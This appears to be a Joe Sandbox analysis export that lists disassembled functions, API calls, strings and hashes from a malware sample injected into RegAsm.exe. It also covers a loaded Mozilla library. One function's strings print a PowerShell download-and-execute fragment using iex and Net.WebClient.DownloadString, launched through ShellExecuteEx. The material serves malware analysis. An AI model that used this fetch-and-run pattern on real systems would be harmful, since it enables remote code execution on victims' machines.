Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: free$_invalid_parameter_noinfo_noreturnmemcpymoz_xmalloc
String ID:
API String ID: 1281542009-0
Opcode ID: ca966f924134ec9468bc18de11d79a77177403cbfdba7e2693315cd198bfc24b
Instruction ID: 09d1ac19034ac7d12703cbfbb53f1e5634451e3d0c396e2b77fb2eae8f072497
Opcode Fuzzy Hash: ca966f924134ec9468bc18de11d79a77177403cbfdba7e2693315cd198bfc24b
Instruction Fuzzy Hash: 74718A746047058FC725CF2CC480A5AB7F1FF4A328B644AADE85A8BBA0D775F845CB90

Function 6C02B790 Relevance: 10.6, APIs: 7, Instructions: 147COMMON

Download Yara Rule

APIs

?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C06CC83,?,?,?,?,?,?,?,?,?,6C06BCAE,?,?,6C05DC2C), ref: 6C02B7E6
?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C06CC83,?,?,?,?,?,?,?,?,?,6C06BCAE,?,?,6C05DC2C), ref: 6C02B80C
?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(?,00000000,?,6C06CC83,?,?,?,?,?,?,?,?,?,6C06BCAE), ref: 6C02B88E
?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140(?,6C06CC83,?,?,?,?,?,?,?,?,?,6C06BCAE,?,?,6C05DC2C), ref: 6C02B896

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: ?good@ios_base@std@@D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@Osfx@?$basic_ostream@
String ID:
API String ID: 922945588-0
Opcode ID: 4e742ffa072dbc2086a61ba0ee4976653830a2008f31bb034577b672db5bb70c
Instruction ID: 3333e6a53d82fd0fa200f1e1a0ccc2b1b9282dcb24f61d5ef3d98f949029d690
Opcode Fuzzy Hash: 4e742ffa072dbc2086a61ba0ee4976653830a2008f31bb034577b672db5bb70c
Instruction Fuzzy Hash: 9E5168357006048FCB25CF59C484B6ABBF5FF89318B69895DE99A87792CB35E801CB80

Function 00412D70 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

ShellExecuteEx.SHELL32(?), ref: 00412EC0

Strings

')", xrefs: 00412E13
C:\ProgramData\, xrefs: 00412DA3
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412E5B
-nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412E18
.ps1, xrefs: 00412DF3

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$.ps1$C:\ProgramData\$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
API String ID: 2215929589-1989157005
Opcode ID: a3660bf6eb38366a5fc88e1f2295be1a68adea8c2c4e3bb7b595f6666764ac78
Instruction ID: d4bc49303887be4e6334ac6b4843b1e71d055e880c24203978c9a7e3e1ca0007
Opcode Fuzzy Hash: a3660bf6eb38366a5fc88e1f2295be1a68adea8c2c4e3bb7b595f6666764ac78
Instruction Fuzzy Hash: 4641FB71E00119ABCF11FBA6DD469CDB7B4AF04308F61406BF514B7191DBB86E8A8B98

Function 6C061D00 Relevance: 10.6, APIs: 7, Instructions: 115threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C061D0F
AcquireSRWLockExclusive.KERNEL32(?,?,6C061BE3,?,?,6C061D96,00000000), ref: 6C061D18
ReleaseSRWLockExclusive.KERNEL32(?,?,6C061BE3,?,?,6C061D96,00000000), ref: 6C061D4C
GetCurrentThreadId.KERNEL32 ref: 6C061DB7
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C061DC0
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C061DDA

Part of subcall function 6C061EF0: GetCurrentThreadId.KERNEL32 ref: 6C061F03
Part of subcall function 6C061EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6C061DF2,00000000,00000000), ref: 6C061F0C
Part of subcall function 6C061EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6C061F20

moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6C061DF4

Part of subcall function 6C02CA10: malloc.MOZGLUE(?), ref: 6C02CA26

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
String ID:
API String ID: 1880959753-0
Opcode ID: c3f7ff74ce29bbc1c29a0aceb4e8af7ec8a0350d63a9d8dca2856e5fb8572bdf
Instruction ID: f07baa141a316057a5dcc4bc7a55da4aa0805f647a4ebea48089bc301146affb
Opcode Fuzzy Hash: c3f7ff74ce29bbc1c29a0aceb4e8af7ec8a0350d63a9d8dca2856e5fb8572bdf
Instruction Fuzzy Hash: BC4158B56017049FCB20DF29C488B56BBF9FB89328F10442EE95A87B51DB71F854CB91

Function 6C0238A0 Relevance: 10.6, APIs: 7, Instructions: 80memoryCOMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6C09E220,?,?,?,?,6C023899,?), ref: 6C0238B2
ReleaseSRWLockExclusive.KERNEL32(6C09E220,?,?,?,6C023899,?), ref: 6C0238C3
free.MOZGLUE(00000000,?,00000000,0000002C,?,?,?,6C023899,?), ref: 6C0238F1
RtlFreeHeap.NTDLL ref: 6C023920
RtlFreeUnicodeString.NTDLL(-0000000C,?,?,?,6C023899,?), ref: 6C02392F
RtlFreeUnicodeString.NTDLL(-00000014,?,?,?,6C023899,?), ref: 6C023943
RtlFreeHeap.NTDLL ref: 6C02396E

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
String ID:
API String ID: 3047341122-0
Opcode ID: dc2193d03703331ccfe40ac15fc105446363bfe847d882a63dd3296e502d1243
Instruction ID: 7469bbcb96f31e561acdb389c45d093b84fc1556432faab6b79f54e55f12cfa7
Opcode Fuzzy Hash: dc2193d03703331ccfe40ac15fc105446363bfe847d882a63dd3296e502d1243
Instruction Fuzzy Hash: 2021D172601720DFDB20DF15C880B9AB7F9EF4A728F558429E95A9BB50C738F845CB90

Function 6C0584E0 Relevance: 10.6, APIs: 7, Instructions: 79COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C0584F3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C05850A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C05851E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C05855B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C05856F
??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C0585AC

Part of subcall function 6C057670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C0585B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C05767F
Part of subcall function 6C057670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C0585B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C057693
Part of subcall function 6C057670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C0585B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C0576A7

free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C0585B2

Part of subcall function 6C035E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C035EDB
Part of subcall function 6C035E90: memset.VCRUNTIME140(6C077765,000000E5,55CCCCCC), ref: 6C035F27
Part of subcall function 6C035E90: LeaveCriticalSection.KERNEL32(?), ref: 6C035FB2

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
String ID:
API String ID: 2666944752-0
Opcode ID: 7451c3a3261e48335fdcdf6d5d713761abe692f6a11bcce381c8396766d2c1eb
Instruction ID: befaf8afd5dff81ec594e3e2d7b53ea9410777d05573efbb7c8ce439cd1d2eeb
Opcode Fuzzy Hash: 7451c3a3261e48335fdcdf6d5d713761abe692f6a11bcce381c8396766d2c1eb
Instruction Fuzzy Hash: 8C2168746006018BDB149F29C888B5AB7E5BF8430DFA44A29E95B83B41DB31F968CB51

Function 6C021640 Relevance: 10.6, APIs: 7, Instructions: 77COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,00000114), ref: 6C021699
VerSetConditionMask.NTDLL ref: 6C0216CB
VerSetConditionMask.NTDLL ref: 6C0216D7
VerSetConditionMask.NTDLL ref: 6C0216DE
VerSetConditionMask.NTDLL ref: 6C0216E5
VerSetConditionMask.NTDLL ref: 6C0216EC
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C0216F9

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: ConditionMask$InfoVerifyVersionmemset
String ID:
API String ID: 375572348-0
Opcode ID: baa0acdb94903d5a05d8003517f2e730b9fc2e8faafb2cfe46ee25265354fbe5
Instruction ID: 12866024a1d24dca6854b7fb5f649d298a9595a688fe60bea7ee4b633af7e643
Opcode Fuzzy Hash: baa0acdb94903d5a05d8003517f2e730b9fc2e8faafb2cfe46ee25265354fbe5
Instruction Fuzzy Hash: 5C21D2B07402086BEB106A648C89FBFB3BCEFC6714F444528F6459B5C0CA799E5486A1

Function 6C05F5B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C04CBE8: GetCurrentProcess.KERNEL32(?,6C0131A7), ref: 6C04CBF1
Part of subcall function 6C04CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0131A7), ref: 6C04CBFA

Part of subcall function 6C059420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C024A68), ref: 6C05945E
Part of subcall function 6C059420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C059470
Part of subcall function 6C059420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C059482
Part of subcall function 6C059420: __Init_thread_footer.LIBCMT ref: 6C05949F

GetCurrentThreadId.KERNEL32 ref: 6C05F619
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C05F598), ref: 6C05F621

Part of subcall function 6C0594D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C0594EE
Part of subcall function 6C0594D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C059508

GetCurrentThreadId.KERNEL32 ref: 6C05F637
AcquireSRWLockExclusive.KERNEL32(6C09F4B8,?,?,00000000,?,6C05F598), ref: 6C05F645
ReleaseSRWLockExclusive.KERNEL32(6C09F4B8,?,?,00000000,?,6C05F598), ref: 6C05F663

Strings

[D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C05F62A

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
API String ID: 1579816589-753366533
Opcode ID: 27f76efc778f83072a3e841161cfadad140e6d5bc47d7c39403cbdb3da0bcf12
Instruction ID: 1af9aab807d22692e3a826dcf4fabe5e94494f5521aa5ad328d1886dc77fed30
Opcode Fuzzy Hash: 27f76efc778f83072a3e841161cfadad140e6d5bc47d7c39403cbdb3da0bcf12
Instruction Fuzzy Hash: A5119175201204ABCA14AF59CA48FA577FDFB86368B902415FA0683F41CF75BC25CBA1

Function 6C022070 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C04AB89: EnterCriticalSection.KERNEL32(6C09E370,?,?,?,6C0134DE,6C09F6CC,?,?,?,?,?,?,?,6C013284), ref: 6C04AB94
Part of subcall function 6C04AB89: LeaveCriticalSection.KERNEL32(6C09E370,?,6C0134DE,6C09F6CC,?,?,?,?,?,?,?,6C013284,?,?,6C0356F6), ref: 6C04ABD1

LoadLibraryW.KERNEL32(combase.dll,6C021C5F), ref: 6C0220AE
GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6C0220CD
__Init_thread_footer.LIBCMT ref: 6C0220E1
FreeLibrary.KERNEL32 ref: 6C022124

Strings

combase.dll, xrefs: 6C0220A9
CoInitializeSecurity, xrefs: 6C0220C7

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoInitializeSecurity$combase.dll
API String ID: 4190559335-2476802802
Opcode ID: b3419600e5e360d13b01f69be53fadb2811f0ecc95db0a6c0688548f7975210d
Instruction ID: cd0cf674a1da14f10edbc8f7c5cac4ae67b094ade1986cec06a256012841267c
Opcode Fuzzy Hash: b3419600e5e360d13b01f69be53fadb2811f0ecc95db0a6c0688548f7975210d
Instruction Fuzzy Hash: 66215976200209EBDF11CF95DC88F9A3BFAFB0A364F109028FA1592610DB759861DF90

Function 6C021FA0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C04AB89: EnterCriticalSection.KERNEL32(6C09E370,?,?,?,6C0134DE,6C09F6CC,?,?,?,?,?,?,?,6C013284), ref: 6C04AB94
Part of subcall function 6C04AB89: LeaveCriticalSection.KERNEL32(6C09E370,?,6C0134DE,6C09F6CC,?,?,?,?,?,?,?,6C013284,?,?,6C0356F6), ref: 6C04ABD1

LoadLibraryW.KERNEL32(combase.dll,?), ref: 6C021FDE
GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 6C021FFD
__Init_thread_footer.LIBCMT ref: 6C022011
FreeLibrary.KERNEL32 ref: 6C022059

Strings

combase.dll, xrefs: 6C021FD9
CoCreateInstance, xrefs: 6C021FF7

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoCreateInstance$combase.dll
API String ID: 4190559335-2197658831
Opcode ID: 01bda4145d712ce553ba2aef04243d79b596e8861305f89c8131c14a94c483df
Instruction ID: b321d8322596f5cfb2f0bacaca8bcdfc8183d242bf5f39f392ebc0c494df696f
Opcode Fuzzy Hash: 01bda4145d712ce553ba2aef04243d79b596e8861305f89c8131c14a94c483df
Instruction Fuzzy Hash: 9C116A74200204AFDF20DF95C888F5A7BBDFB46369F109029FA0982661CB34A890DFA1

Function 6C020EE0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C04AB89: EnterCriticalSection.KERNEL32(6C09E370,?,?,?,6C0134DE,6C09F6CC,?,?,?,?,?,?,?,6C013284), ref: 6C04AB94
Part of subcall function 6C04AB89: LeaveCriticalSection.KERNEL32(6C09E370,?,6C0134DE,6C09F6CC,?,?,?,?,?,?,?,6C013284,?,?,6C0356F6), ref: 6C04ABD1

LoadLibraryW.KERNEL32(combase.dll,00000000,?,6C04D9F0,00000000), ref: 6C020F1D
GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 6C020F3C
__Init_thread_footer.LIBCMT ref: 6C020F50
FreeLibrary.KERNEL32(?,6C04D9F0,00000000), ref: 6C020F86

Strings

combase.dll, xrefs: 6C020F18
CoInitializeEx, xrefs: 6C020F36

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoInitializeEx$combase.dll
API String ID: 4190559335-2063391169
Opcode ID: 0a6a86cdef84d8f8b041c11f691ee0c6f7193b1f5b4182a3e206bcc597e2dfca
Instruction ID: ba6768599f20d055435c54930961df0e8144707640f6a3de00548705484bc31e
Opcode Fuzzy Hash: 0a6a86cdef84d8f8b041c11f691ee0c6f7193b1f5b4182a3e206bcc597e2dfca
Instruction Fuzzy Hash: 3411A074349250DBDF60CF64C918B8A3BFCFB4A329F105229FA2992B41DF34A801CA51

Function 0041FA24 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 0041FA6D
DName::operator+.LIBCMT ref: 0041FA74
DName::DName.LIBCMT ref: 0041FA96
DName::operator+.LIBCMT ref: 0041FA9D
DName::operator+.LIBCMT ref: 0041FAA4

Strings

throw(, xrefs: 0041FA65, 0041FA8E

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Name::operator+$NameName::
String ID: throw(
API String ID: 168861036-3159766648
Opcode ID: acf3c3f6b62bbe0bf60cea1499b19d7b2d2c206c409909a41351c69a4c2d4579
Instruction ID: f88cabbda18bcd4624fad7201f608a4b7bec8680ec46b3ab11068729d5ffd4ff
Opcode Fuzzy Hash: acf3c3f6b62bbe0bf60cea1499b19d7b2d2c206c409909a41351c69a4c2d4579
Instruction Fuzzy Hash: 87019B70600208BFCF14EF64D852EED77B5EF44748F10406AF905972A5DA78EA8B878C

Function 6C05F540 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C059420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C024A68), ref: 6C05945E
Part of subcall function 6C059420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C059470
Part of subcall function 6C059420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C059482
Part of subcall function 6C059420: __Init_thread_footer.LIBCMT ref: 6C05949F

GetCurrentThreadId.KERNEL32 ref: 6C05F559
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C05F561

Part of subcall function 6C0594D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C0594EE
Part of subcall function 6C0594D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C059508

GetCurrentThreadId.KERNEL32 ref: 6C05F577
AcquireSRWLockExclusive.KERNEL32(6C09F4B8), ref: 6C05F585
ReleaseSRWLockExclusive.KERNEL32(6C09F4B8), ref: 6C05F5A3

Strings

[I %d/%d] profiler_pause_sampling, xrefs: 6C05F3A8
[I %d/%d] profiler_resume_sampling, xrefs: 6C05F499
[D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C05F56A
[I %d/%d] profiler_resume, xrefs: 6C05F239

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
API String ID: 2848912005-2840072211
Opcode ID: fd31bd4f66f410bd6e46b1a604a7bd032dd914f2cb7125700cd64de6a48b63cf
Instruction ID: d4c0ce9029fb16b274574c8a3f1a5f70bfd3b327a2896cd7b22da629fbca6e8d
Opcode Fuzzy Hash: fd31bd4f66f410bd6e46b1a604a7bd032dd914f2cb7125700cd64de6a48b63cf
